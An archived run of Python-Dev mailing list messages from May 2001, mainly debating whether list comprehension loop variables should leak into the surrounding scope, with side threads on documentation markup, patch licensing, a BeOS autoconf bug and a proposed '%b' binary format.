PyChecker is available on SourceForge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 07:31:01 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 01:31:01 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for development version of Python (2.2).

Mostly small updates, but I've worked on new markup for grammar
productions used in the Reference Manual.  Currently, only the lexical
productions in Chapter 2 of the manual have been converted to the new
markup and layout.  Please take a look and send comments to
doc-sig at python.org; the first page containing these changes is at:

    http://python.sourceforge.net/devel-docs/ref/identifiers.html

The changes needed to implement the markup have not been checked in
yet, and there are some bugs in the implementation (both for HTML and
PDF), but this should make the productions easier to navigate.

I've tested the HTML version on Linux only with Mozilla 0.9, Opera
5.0b8, and Netscape Navigator 4.77.  Navigator is definitely lagging
behind in CSS support!

Also added Michel Pelletier's documentation for the HTMLParser module,
with some small changes.


From tim.one at home.com  Wed May 30 07:51:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 01:51:04 -0400
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>

[Fred Drake]
> The development version of the documentation has been updated:
>
> 	http://python.sourceforge.net/devel-docs/
>
> Incremental update for development version of Python (2.2).
>
> Mostly small updates, but I've worked on new markup for grammar
> productions used in the Reference Manual.  Currently, only the lexical
> productions in Chapter 2 of the manual have been converted to the new
> markup and layout.  Please take a look and send comments to
> doc-sig at python.org; the first page containing these changes is at:
>
>     http://python.sourceforge.net/devel-docs/ref/identifiers.html
>
> The changes needed to implement the markup have not been checked in
> yet, and there are some bugs in the implementation (both for HTML and
> PDF), but this should make the productions easier to navigate.

Let me suggest starting with

    http://python.sourceforge.net/devel-docs/ref/integers.html

instead, and clicking on "digit" in the "hexdigit" production.  The problem
with the originally suggested page is that all the links point into the same
paragraph, so "nothing happens" when you click one.  But "digit" was the
cause of a bogus bug report, as the submitter didn't realize "digit" had
been defined earlier in the docs, and without something like these mondo
cool new links it's almost impossible to find cross-section production
definitions.

Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
node24.html page it refers to doesn't seem to exist.


From fdrake at acm.org  Wed May 30 07:53:23 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 01:53:23 -0400 (EDT)
Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates]
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com>
	<LNBBLJKPBEHFEDALKOLCKEEIKFAA.tim.one@home.com>
Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > Stumbled into one glitch:  nonzerodigit doesn't resolve correctly; the
 > node24.html page it refers to doesn't seem to exist.

  That was the bug alluded to.  The digit* grouped with the
nonzerodigit also doesn't work, although the other two uses of digit
on that page (floating.html) work properly.  I'll investigate
tomorrow; just too tired tonight.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one at home.com  Wed May 30 09:47:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 03:47:47 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>

[David Beazley]
> ...
> However, I've also been shooting myself in the foot a little more
> than usual
> ...
> Because of this, I have frequently found myself debugging the
> following programming error:

If "frequently" is "a little more than usual", then it sounds like your
problems in all areas are too common for us to really help you by fixing
this one <wink>.

OK, I'm afraid the behavior follows from taking seriously the idea that
listcomps are syntactic sugar for a specific pattern of nested loops and
"if" tests.  That was done to make it explainable, and the correspondence is
indeed exact.  The implementation already creates "invisible" names:

>>> [repr(name) for name in globals().keys()]
["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
>>>

Where did "_[1]" come from?  You guessed it.  Look for it after the listcomp
finishes and it's gone:

>>> globals().keys()
['__builtins__', '__name__', 'name', '__doc__']
>>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent
loop nest.

> ...
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner

I'm not sure it's worth losing the exact correspondence with nested loops;
or that it's not worth it either.  Note that "the iterator variables"
needn't be bare names:

>>> class x:
...     pass
...
>>> [1 for x.i in range(3)]
[1, 1, 1]
>>> x.i
2
>>>

This complicates explaining exactly how you want to deviate from the
for-loop model.  So, I think, does this:

>>> [i for i in range(2) for i in range(2, 5)]
[2, 3, 4, 2, 3, 4]
>>>

That is, even in simple cases, is the desired scope attached to the "for" or
to the "[]"?  Python doesn't have a problem with reusing a name as a for
target in nested loops (or in listcomps today).
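Spelled out as the nested loops the comprehension stands for, the same reuse of i is plain Python (a sketch for illustration):

```python
# Spelled-out form of  [i for i in range(2) for i in range(2, 5)]
out = []
for i in range(2):
    for i in range(2, 5):   # the inner loop reuses the outer target name
        out.append(i)

print(out)  # [2, 3, 4, 2, 3, 4]
```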

> ...
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

Not even in a debugger, when the operation has completed via unexpected
exception, and you're desperate to know what the control vrbl was bound to
at the time of death?  Or in an exception handler?

>>> import sys
>>> try:
...     [i*i for i in xrange(sys.maxint)]
... except OverflowError:
...     raise OverflowError("oops! blew up at %d" % i)
...
Traceback (most recent call last):
  File "<stdin>", line 4, in ?
OverflowError: oops! blew up at 46341
>>>
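The same post-mortem pattern works with an ordinary for loop, since the target stays bound after an exception escapes the loop. A sketch with a hypothetical helper, position_of_failure, that reports where a division by zero happened:

```python
def position_of_failure(values):
    """Return the index being processed when a ZeroDivisionError escaped."""
    try:
        for pos, v in enumerate(values):
            _ = 1.0 / v   # raises ZeroDivisionError on a zero entry
    except ZeroDivisionError:
        # pos is still bound to the index at the time of death
        return pos
    return None

print(position_of_failure([4, 2, 0, 5]))  # 2
```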

Or what about:

i = 12
def f():
    print i
    return [i for i in range(i)]
f()

1. Should "print i" print 12, or raise UnboundLocalError?

2. Does the "i" in "range(i)" refer to the global i, or is that just
   senseless?

So long as the for-loop model is followed faithfully, nothing is hard to
explain or predict, and simply because there's nothing truly new.
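Under the for-loop model, question 1 has a definite answer: a for binding of i anywhere in f makes i local to the whole function body, so reading it before the loop fails. A sketch using an explicit loop in place of the comprehension:

```python
i = 12

def f():
    # The for statement below binds i, which makes i local to f for the
    # entire body; the read before the loop therefore raises
    # UnboundLocalError instead of seeing the global 12.
    try:
        before = i
    except UnboundLocalError:
        before = "UnboundLocalError"
    result = []
    for i in range(3):
        result.append(i)
    return before, result

print(f())  # ('UnboundLocalError', [0, 1, 2])
```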

> I was actually quite surprised with this behavior the first time I saw
> it.

Me too <wink>.

> I suspect most other programmers would not anticipate this side
> effect either.

I share the suspicion, but am not sure why:  "for" is a binding construct in
Python, so being surprised by "for" binding a name is itself surprising.

Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

>>> i = 12
>>> (lambda: [i**2 for i in range(4)])()
[0, 1, 4, 9]
>>> i
12
>>>

That's more like Haskell does it.  But the day we explain a Python construct
in terms of a lambda transformation is the day Guido kills all of us <wink>.


From esr at thyrsus.com  Wed May 30 10:00:56 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 04:00:56 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <20010530040056.A27662@thyrsus.com>

Tim Peters <tim.one at home.com>:
> That's more like Haskell does it.  But the day we explain a Python construct
> in terms of a lambda transformation is the day Guido kills all of us <wink>.

They'll get *my* lambdas when they pry them from my cold, dead fingers <wink>,
but I find I don't have a strong opinion about how the scoping should work.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Experience should teach us to be most on our guard to protect liberty
when the government's purposes are beneficent...  The greatest dangers
to liberty lurk in insidious encroachment by men of zeal, well meaning
but without understanding."
	-- Supreme Court Justice Louis Brandeis


From thomas at xs4all.net  Wed May 30 13:14:24 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 30 May 2001 13:14:24 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700
References: <E15525f-0003AG-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010530131424.Y690@xs4all.nl>

On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:

> OK, I'm un-withdrawing this patch.  Just had to get things
> straight with our lawyer. The patch is released under the
> following license (the X11 license with 4 extra paragraphs
> of disclaimers :):
> http://www.zoteca.com/opensource/LICENSE.txt

This raises an interesting point. Do we want separate pieces of the Python
distribution to have separate licences ? I'd point out that the zoteca
licence isn't mentioned on the OSI site as an Approved Licence, and that the
licence contains a copyright notice, but no clear statement whether it's
allowed to copy the licence other than together with the piece of software
it's distributed with.

The easiest solution would of course be for Itamar to get his boss/lawyers
to give us the right to relicence it under the PSF licence :)

-- 
Thomas Wouters <thomas at xs4all.net>


From jack at oratrix.nl  Wed May 30 14:26:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 30 May 2001 14:26:39 +0200
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> 
Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl>

> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote:
> 
> > OK, I'm un-withdrawing this patch.  Just had to get things
> > straight with our lawyer. The patch is released under the
> > following license (the X11 license with 4 extra paragraphs
> > of disclaimers :):
> > http://www.zoteca.com/opensource/LICENSE.txt
>
> [...]
>
> The easiest solution would of course be for Itamar to get his boss/lawyers
> to give us the right to relicence it under the PSF licence :)

I think this is the only viable solution. If various parts of Python have
different license agreements, this may well be a reason for people not to use
Python, because of the hassle of figuring out which pieces fit their own
licensing policy.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From beazley at cs.uchicago.edu  Wed May 30 15:49:29 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Wed, 30 May 2001 08:49:29 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>

Tim Peters writes:
 > > Because of this, I have frequently found myself debugging the
 > > following programming error:
 > 
 > If "frequently" is "a little more than usual", then it sounds like your
 > problems in all areas are too common for us to really help you by fixing
 > this one <wink>.

I've probably been bitten by this about 5-10 times over the last few
months. I can also say that it's a real bugger to track down when it
happens.  Now while this may just be a user problem on my part (which
I can accept), I think there is a much deeper semantic problem with
the current implementation of list comprehensions.  Specifically, we
now have this really cool list construction technique that is, for all
practical purposes, an operator.  Yet, at the same time, this
"operator" has a really nasty side-effect of changing the values of
variables in the surrounding scope in a very unnatural and unexpected
way.

More generally, it's essentially the same behavior that you would get
if you wrote some code like this:

    a = expr(x,y)

and expr() went off and nuked the value of x, replacing it with
something completely different (note: I'm not talking about cases
where x might be mutable here).  Since you can write things like this

    a = [ 2*x for x in s]

it's easy to view the right hand side as being isolated in the same
way as a normal expression (where the name of the iteration variable
"x" is incidental--a throwaway if you will).

Maybe everyone else views list comprehensions as a series of
statements (the syntactic sugar for nested for-loop idea).  However,
if you look at how they can be used, it's completely different than
this.  Specifically, if I write something like this:

   a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into
the following sequence of statements:

   t1 = [ ]
   for x in s:
      t1.append(2*x)
   t2 = [ ]
   for x in t:
      t2.append(3*x)
   a = t1 + t2

 > 
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2
 > >>>
 > 

Hmmm. I didn't realize that you could even do this.    Yes, this would
definitely present a problem.   However, if list comprehensions were
modified not to assign any names in the current scope, it still
seems like this would work (in this case, "x" is already defined and
"x.i" is not creating a new name, but is setting an attribute on
something else).   Couldn't nested scopes be used to implement this
in some manner?
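An ordinary function can stand in for the proposed private scope to check this. In the sketch below (Box and fill are hypothetical names), the attribute target binds no new name inside fill, so the store still reaches the outer object:

```python
class Box:
    pass

def fill():
    # Box is only read here, never assigned, so it resolves to the
    # global class; the loop target Box.i is an attribute store on it.
    result = []
    for Box.i in range(3):
        result.append(1)
    return result

print(fill())  # [1, 1, 1]
print(Box.i)   # 2
```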

 > > ...
 > > Just as an aside, I have never intentionally used the iterator
 > > variable of a list comprehension after the operation has completed.
 > 
 > Not even in a debugger, when the operation has completed via unexpected
 > exception, and you're desperate to know what the control vrbl was bound to
 > at the time of death?  Or in an exception handler?
 > 

Nope.  I don't make programming mistakes---well, other than this one,
and well, all of those other ones :-).

 > Another principled model is possible, where
 > 
 >     [f(i) for i in whatever]
 > 
 > is treated like
 > 
 >     (lambda: [f(i) for i in whatever])()
 > 
 > >>> i = 12
 > >>> (lambda: [i**2 for i in range(4)])()
 > [0, 1, 4, 9]
 > >>> i
 > 12
 > >>>
 > 
 > That's more like Haskell does it.  But the day we explain a Python construct
 > in terms of a lambda transformation is the day Guido kills all of us <wink>.

Ah yes, well this is exactly the kind of behavior that seems most
natural to me.   It's also the behavior that everyone expected when I
went around to the various Python hackers in the department and asked
them about it yesterday.

I suppose I could just write this:

  a = (lambda s: [2*i for i in s])(s)

However, that's pretty ugly.

In any case, I'm mostly just curious if anyone else has been bitten by
the problem I've described.  I would certainly love to see a fix for
it (I would even volunteer to work on a prototype implementation if
there is interest). On the other hand, if no changes are deemed
necessary, we should at least try to better emphasize this behavior in the
documentation--perhaps encouraging people to use private names.  For
example:

   a = [_i*2 for _i in t]
   
(although, I have to say that this just looks like a gross hack--I'd
rather not have to resort to doing this).

Cheers,

Dave


From fdrake at acm.org  Wed May 30 16:03:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 10:03:13 -0400 (EDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
	<LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com>
	<15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>

David Beazley writes:
 > Maybe everyone else views list comprehensions as a series of
 > statements (the syntactic sugar for nested for-loop idea).  However,

  I certainly don't.  I know that that was used as part of the design
consideration, but it's not at all clear to me that this is
desirable.
  If I see code like this:

        x = 42
        L = [x**2 for x in range(2000)]
        print x

I think it should map to something like this from C++:

        int x = 42;
        int L[2000];

        for (int x = 0; x < 2000; ++x) {
            L[x] = x * x;
        }
        printf("%d\n", x);

i.e., both *should* print "42\n" on standard output.

Tim sez:
 > I'm not sure it's worth losing the exact correspondence with nested loops;
 > or that it's not worth it either.  Note that "the iterator variables"
 > needn't be bare names:
 > 
 > >>> class x:
 > ...     pass
 > ...
 > >>> [1 for x.i in range(3)]
 > [1, 1, 1]
 > >>> x.i
 > 2

David:
 > Hmmm. I didn't realize that you could even do this.    Yes, this would
 > definitely present a problem.   However, if list comprehensions were

  I didn't realize this either.  I'm quite surprised by it, in fact,
though I understand (I think) why it works that way.  But was this
intentional?  It seems like pure evil to me!  I'd only expect it to
support bare names and sequence unpacking (with only bare names at the
"edge" of all nested unpackings).


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From gward at python.net  Wed May 30 16:36:30 2001
From: gward at python.net (Greg Ward)
Date: Wed, 30 May 2001 10:36:30 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <LNBBLJKPBEHFEDALKOLCAEENKFAA.tim.one@home.com> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <20010530103630.B11580@gerg.ca>

On 30 May 2001, David Beazley said:
> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.

For the record, I have not been bitten by this, but I probably don't use
list comps as much as you do.

I can completely sympathize with both your and Tim's point of view
here.  Both make perfect sense at the same time.  Hmmm.

"Do I contradict myself?
 Very well then I contradict myself,
 (I am large, I contain multitudes)"

        Greg
-- 
Greg Ward - Unix nerd                                   gward at python.net
http://starship.python.net/~gward/
Money is a powerful aphrodisiac.  But flowers work almost as well.


From barry at digicool.com  Wed May 30 17:07:12 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 11:07:12 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
References: <thomas@xs4all.net>
	<20010530131424.Y690@xs4all.nl>
	<20010530122702.F3FE53B8999@snelboot.oratrix.nl>
Message-ID: <15125.3232.925401.563151@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> The easiest solution would of course be for Itamar to get his
    TW> boss/lawyers to give us the right to relicence it under the
    TW> PSF licence :)

>>>>> "JJ" == Jack Jansen <jack at oratrix.nl> writes:

    JJ> I think this is the only viable solution. If various parts of
    JJ> Python have different license agreements this may well be a
    JJ> reason for people not to use Python because the hassle of
    JJ> figuring out which pieces fit their own licensing policy.

I completely agree.  IMO, the most important job of the PSF is to make
the Python IP sane again.  That means clearing as much of the existing
rights as possible, and releasing it under the NAIPL (New And Improved
Python License).  Any code that is licensed differently could mean
that it'll be ripped out of some re-distributions.  I'd be less
concerned about some ancillary module that few people use, and much
more concerned about some core piece of the code.

-Barry


From mal at lemburg.com  Wed May 30 21:57:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 21:57:17 +0200
Subject: [Python-Dev] Autoconf problems on BeOS
Message-ID: <3B15509D.C790D5DF@lemburg.com>

I have a bug report assigned to myself which really is more
about autoconf than Unicode. The problem is that the
SIZEOF_xxx tests cause the Metrowerks compiler on BeOS to
fail and this again causes these defines to be set to 0 !

Could someone with more autoconf experience please have a look ?

https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470

Thanks,
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Wed May 30 22:07:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:07:37 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>

[Tim]
> Note that "the iterator variables" needn't be bare names:

[Fred]
>   I didn't realize this either.

You have to get your head out of the docs and read more code <wink>.

> I'm quite surprised by it, in fact, though I understand (I think) why
> it works that way.  But was this intentional?

I expect so.

> It seems like pure evil to me!

Sometimes it's the bee's knees; for example,

>>> digits = range(3)
>>> x = [None] * 3
>>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]
>>> base3
[[0, 0, 0], [0, 0, 1], [0, 0, 2],
 [0, 1, 0], [0, 1, 1], [0, 1, 2],
 [0, 2, 0], [0, 2, 1], [0, 2, 2],
 [1, 0, 0], [1, 0, 1], [1, 0, 2],
 [1, 1, 0], [1, 1, 1], [1, 1, 2],
 [1, 2, 0], [1, 2, 1], [1, 2, 2],
 [2, 0, 0], [2, 0, 1], [2, 0, 2],
 [2, 1, 0], [2, 1, 1], [2, 1, 2],
 [2, 2, 0], [2, 2, 1], [2, 2, 2]]
>>>

I've done stuff "like that" often, albeit via the nested-loop spelling.
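The subscript-target trick still works under modern Python 3 (an assumption about the reader's interpreter; the thread itself is about 2.x). Here is a sketch that checks it against `itertools.product`, which is the more common spelling of the same table today:

```python
import itertools

digits = range(3)
x = [None] * 3
# Each "for x[k] in digits" clause assigns into the list x in place;
# x[:] snapshots its current contents as a new list.
base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]

# The same table via itertools.product (last position varies fastest).
via_product = [list(t) for t in itertools.product(digits, repeat=3)]

print(len(base3))            # 27
print(base3 == via_product)  # True
```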

> I'd only expect it to support bare names and sequence unpacking (with
> only bare names at the "edge" of all nested unpackings).

It's too late to take it away now!  Python always worked this way.  And it's
really got nothing to do with implementing what David wants (e.g., the
lambda transformation I mentioned preserves its semantics), apart from (I
hope) driving home that changes need to be considered very carefully.


From tim.one at home.com  Wed May 30 22:22:19 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:22:19 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>

[David Beazley, pretty much repeats why he doesn't like the current scheme]

I hoped it was clear the first time I was at least half sympathetic!  If it
wasn't, I am <wink>.

>> >>> i = 12
>> >>> (lambda: [i**2 for i in range(4)])()
>> [0, 1, 4, 9]
>> >>> i
>> 12
>> >>>
>>
>> That's more like Haskell does it.

> Ah yes, well this is exactly the kind of behavior that seems most
> natural to me.   It's also the behavior that everyone expected when I
> went around to the various Python hackers in the department and asked
> them about it yesterday.

I believe that.

> I suppose I could just write this:
>
>   a = (lambda s: [2*i for i in s])(s)
>
> However, that's pretty ugly.

It's too complicated, isn't it?  In the presence of nested scopes (which are
reality in 2.2),

    a = (lambda: [2*i for i in s])()

does the same thing and is conceptually clearer.  I'm not suggesting that
you actually write that, but view it as a *model* for your intended
semantics.  I wouldn't want to see the implementation actually use a lambda
under the covers, either, but we need some crisp way to explain the intent.
Note that the lambda-trick *model* "does the right thing" for for-loop
targets like x.i and x[i] too.
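A small sketch of what "the right thing" means for such targets, assuming modern Python 3 (where comprehensions already have their own scope, so the lambda only mirrors the model). An attribute target still mutates the outer object, while a bare-name target stays private. `Namespace` is a hypothetical stand-in for the bare `class x` used earlier in the thread.

```python
class Namespace:
    """Hypothetical stand-in for the bare class x from the example."""
    pass

ns = Namespace()

# The lambda (and the comprehension) get their own scope, but ns is
# looked up in the enclosing scope and its attribute is assigned there,
# so the side effect on ns.i survives.
result = (lambda: [1 for ns.i in range(3)])()
print(result)  # [1, 1, 1]
print(ns.i)    # 2

# A bare-name target in the same position stays private.
i = "outer"
(lambda: [1 for i in range(3)])()
print(i)       # outer
```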

> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.  I would certainly love to see a fix for
> it (I would even volunteer to work on a prototype implementation if
> there is interest).

I encourage that, but since it's not 100% backward-compatible you'll enjoy
the usual range of hysterical <wink> opposition.  Needs a PEP, and possibly
even an associated future-statement.  Overall, I'm more in favor of changing
it than not.


From skip at pobox.com  Wed May 30 22:48:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Wed, 30 May 2001 15:48:47 -0500
Subject: [Python-Dev] scoping and list comprehensions
Message-ID: <15125.23727.168431.762320@beluga.mojam.com>

Regarding the issue of how list comprehensions should relate to their
environment, perhaps instead of modifying list comprehensions to make them
execute in new local scopes (or at least appear to) a better solution would
be to allow a new local scope to be introduced inline, sort of like in C:

    {
        int i;
	for (i=0; i < 10; i++) {
            dostuffwith(i);
	}
    }

While this might be used more for list comprehensions than other constructs,
I'm sure people will find a way to (ab)use it for other things as well.  I
don't see an obvious way of adding such functionality to Python without
introducing a new keyword though, which is going to make it difficult to get
past Guido:

    l = []
    scope:
        l = [i**2 for i in range(10)]
    print l

Hmmm, wait a minute, what if you terminated a block introducer (if or while
clause or try/except clauses) with something other than a colon?  (I'm just
thinking out loud, I don't think this is necessarily a good solution).

    if 1:		# no new scope introduced
        l = [i**2 for i in range(10)]
    print l

vs.

    if 1;		# new scope introduced for enclosed block
        l = [i**2 for i in range(10)]
    print l

That certainly has some line noise qualities about it, especially since
colons and semicolons are visually so similar, but does offer an alternative
to introducing a new keyword into the language.

Hmmm, wait another minute, perhaps you could simply overload def:

    l = []
    def:
        l = [i**2 for i in range(10)]
    print l

There's also the problem of how to export results from the scope, though
perhaps the new nested scope stuff provides a solution to that.  (I've
ignored them so far, so I can't tell...)

Would it be possible for the compiler to recognize the degenerate def: and
simply mangle any names that would clash instead of introducing an actual
new execution frame?  The above might be equivalent to

    l = []
    l = [__mangled_i**2 for __mangled_i in range(10)]
    print l

if 'i' already existed in the same scope.

Just thinking out loud.  I'm not sure any of these ideas is any better than
the current state of affairs.

Skip


From Greg.Wilson at baltimore.com  Wed May 30 23:11:16 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 30 May 2001 17:11:16 -0400
Subject: [Python-Dev] %b format?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>

I would like to add a "%b" format for converting
numbers to binary format (1's and 0's).  I realize
this isn't a C-ism, but it would be very useful for
teaching purposes, as newcomers find 101101 a lot
easier to understand than 0x2D.

Reactions?

Greg




From esr at thyrsus.com  Wed May 30 23:28:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:28:38 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <20010530172838.A778@thyrsus.com>

Greg Wilson <Greg.Wilson at baltimore.com>:
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).  I realize
> this isn't a C-ism, but it would be very useful for
> teaching purposes, as newcomers find 101101 a lot
> easier to understand than 0x2D.
> 
> Reactions?

+1.  Didactically pretty useful, and the additional code won't boost
global complexity much.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Where rights secured by the Constitution are involved, there can be no
rule making or legislation which would abrogate them.
        -- Miranda vs. Arizona, 384 US 436 p. 491


From tim.one at home.com  Wed May 30 23:30:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:30:49 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <20010530131424.Y690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>

[Thomas Wouters]
> This raises an interesting point. Do we want separate pieces of the
> Python distribution to have separate licences ?

This is a question for the PSF to resolve, since the PSF is intended to
become the sole legal owner of Python's IP rights.

My position will be that nothing ships in the distribution unless copyright
has been assigned to the PSF, or the contributor has agreed to give the PSF
a non-exclusive irrevocable etc license to release their work under the PSF
license du jour.  Fleshing out the second option so as to prevent abuse on
either side is going to require significant effort ("what if the PSF goes
away?", "what if the PSF changes its license to something I hate?", "what if
I change my mind?", etc).

Unfortunately, significant effort takes significant time too, and nobody has
started on this yet.


From mal at lemburg.com  Wed May 30 23:31:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 23:31:06 +0200
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com>
Message-ID: <3B15669A.43B70A44@lemburg.com>

"Eric S. Raymond" wrote:
> 
> Greg Wilson <Greg.Wilson at baltimore.com>:
> > I would like to add a "%b" format for converting
> > numbers to binary format (1's and 0's).  I realize
> > this isn't a C-ism, but it would be very useful for
> > teaching purposes, as newcomers find 101101 a lot
> > easier to understand than 0x2D.
> >
> > Reactions?
> 
> +1.  Didactically pretty useful, and the additional code won't boost
> global complexity much.

Good idea. The only question I have is: in which order will
you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I am thinking of adding a bit field type to mxNumber and have
the same problem there...

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


